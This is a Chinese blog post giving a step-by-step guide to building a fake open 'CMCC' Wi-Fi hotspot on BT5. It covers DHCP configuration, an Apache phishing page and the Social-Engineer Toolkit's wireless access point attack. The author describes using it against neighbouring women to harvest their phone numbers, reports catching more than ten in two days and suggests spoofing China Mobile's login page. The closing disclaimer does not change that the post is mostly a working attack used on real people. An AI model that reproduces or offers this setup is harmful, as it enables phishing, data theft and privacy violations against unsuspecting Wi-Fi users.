0x00 背景
那是一个漆黑的夜晚,北风凛凛,我和我的小伙伴们结伴走在回家的路上。下面……没有了,哈哈……我是标题党!
言归正传,我和我的小伙伴们住的地方离某知名艺术大学比较近,某天晚上下班回家,在开门的时候碰到几位美女,发现她们住在我们对面,使我们这群IT基友们甚是激动。巴不得凑上去对美女说一句“我是修电脑的,你家电脑慢不慢,我免费帮你弄下?”。
YY归YY,但我们这群搞IT的都是比较内敛的,怎么好意思主动搭讪,因为我们都是有身份证的人。回到屋里很不淡定,苦思冥想好几分钟;“我们不好意思问她们要,为什么不让他们主动给我们呢?”
0x01 准备
我们附近没有CMCC信号,我们就想搭建一个免费的CMCC,让她们主动来输入手机号认证,岂不更好,下面是实施计划。
准备:无线网卡(8137)、bt5、钓鱼页面
一:插入无线网卡进入BT5,把网卡启动起来,给eth0配个ip
#ifconfig eth0 up
#ifconfig wlan0 up
#ifconfig eht0 192.168.10.2/24
二:下面要安装dhcp和配置
#apt-get install dhcp3-server
# vi /etc/default/dhcp3-server
INTERFACES=”eth0″ 修改为 INTERFACES=”at0″
# vi /etc/dhcp3/dhcpd.conf
把下面贴进去,或者改成自己想要分的网段。
default-lease-time 600;
max-lease-time 7200;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.10.255;
option routers 192.168.10.2;
option domain-name-servers 192.168.10.1;
option domain-name "www.metasploit.cn";
subnet 192.168.10.0 netmask 255.255.255.0 {
range 192.168.10.10 192.168.10.100;
}
如图
三:启动apache和配置钓鱼页面
# /etc/init.d/apache2 start
# cd /var/www/ //进入网站目录,bt5里apache默认首页是index.html
#vi index.html //修改成自己的钓鱼页面,这里为了演示,我插入基础钓鱼
BT5里面我安装的有XSS平台,这里的Ip要注意,要和刚才我们在dhcp配置文件里面分配的ip段同网段,否则别人连接进来,访问不了的;
当然如果你直接伪造成移动CMCC页面也行!
四:准备的差不多了,神器该派出来了
# cd /pentest/exploits/set/
# ./set
这里选择第一个set>1
1) Social-Engineering Attacks
下一步
这里选择第一个set>8
8) WirelessAccess Point Attack Vector
下一步
set:wireless>1 //选择1 启动
会提示让你编辑dhcp3-server这个文件。按Ctrl+x 直接退出就可以,因为之前我们编辑过了。
下一步
选择分配的Ip段
set:wireless>2
Enter the wireless network interface (ex. wlan0):wlan0 //选择wlan0
(忘记说一个,# vi /pentest/exploits/set/config/set_config.py 更改为自己想要的AP名字,我这里改成CMCC)
下面是效果
连接AP不用输入密码
打开任意网站都会跳到我的钓鱼页面
手机UC登陆效果
总结:
钓了2天,钓到10多个“美女”手机号码,效果还是不错,如果伪造成cmcc登陆页面,效果会更好! (仅限技术研究,切勿用于法非用途!!!后果自负)
原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/53103.html